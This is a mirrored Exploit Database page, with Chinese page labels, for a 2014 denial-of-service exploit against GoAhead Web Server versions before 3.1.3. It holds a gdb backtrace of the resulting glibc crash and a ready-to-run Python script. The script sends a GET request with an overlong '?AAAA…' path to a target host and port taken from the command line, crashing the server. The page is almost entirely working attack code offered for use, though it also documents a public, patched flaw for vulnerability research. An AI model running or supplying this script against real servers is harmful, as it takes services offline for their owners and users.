GoAhead Web Server 3.1.x – Denial of Service

• Exploit Database
• 108 阅读

• 作者： Alaeddine MESBAHI
  日期： 2014-02-26
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/31915/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

  #!/usr/bin/python   &apos;&apos;&apos; GoAhead Web Server version prior to 3.1.3 is vulnerable to DoS. A fix exists for version 3.2. The Web Server crashes completely once this requests is received. The vulnerability doesn&apos;t seem to be exploitable on Linux versions ... could be wrong :) !   Official Issue Post: https://github.com/embedthis/goahead/issues/77   (gdb) bt #00x00007ffff7a50425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64 #10x00007ffff7a53b8b in __GI_abort () at abort.c:91 #20x00007ffff7a8e39e in __libc_message (do_abort=2, fmt=0x7ffff7b98748 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201 #30x00007ffff7a98b96 in malloc_printerr (action=3, str=0x7ffff7b98838 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:5039 #40x00007ffff7fdc607 in termWebs (wp=0x40cfc0, reuse=<optimized out>) at src/http.c:457 #50x00007ffff7fdc91b in reuseConn (wp=0x40cfc0) at src/http.c:520 #6complete (wp=0x40cfc0, reuse=1) at src/http.c:575 #70x00007ffff7fdd85f in websPump (wp=0x40cfc0) at src/http.c:837 #80x00007ffff7fdeac8 in readEvent (wp=0x40cfc0) at src/http.c:797 #9socketEvent (wptr=0x40cfc0, mask=2, sid=<optimized out>) at src/http.c:735 #10 socketEvent (sid=<optimized out>, mask=2, wptr=0x40cfc0) at src/http.c:723 #11 0x00007ffff7fdee38 in websAccept (sid=1, ipaddr=0x7fffffffd990 "127.0.0.1", port=54172, listenSid=<optimized out>) at src/http.c:714 #12 0x00007ffff7feb66a in socketAccept (sp=0x40cb80) at src/socket.c:327 #13 0x00007ffff7feb7c8 in socketDoEvent (sp=0x40cb80) at src/socket.c:639 #14 socketProcess () at src/socket.c:623 #15 0x00007ffff7fd93ed in websServiceEvents (finished=0x4030f0) at src/http.c:1290 #16 0x00000000004012ee in main (argc=<optimized out>, argv=0x7fffffffdfd8, envp=<optimized out>) at src/goahead.c:146 &apos;&apos;&apos;     import socket import os import sys import struct   HOST = sys.argv[1] PORT = int(sys.argv[2])   crash = &apos;?&apos;*1 + &apos;A&apos; * 1000   payload = &apos;GET &apos; + crash + &apos; HTTP/1.1\r\n&apos; payload += &apos;Host: &apos; + HOST + &apos;:&apos; + str(PORT) + &apos;\r\n\r\n&apos;   expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect((HOST,PORT)) expl.send(payload) data = expl.recv(1024) print data expl.close()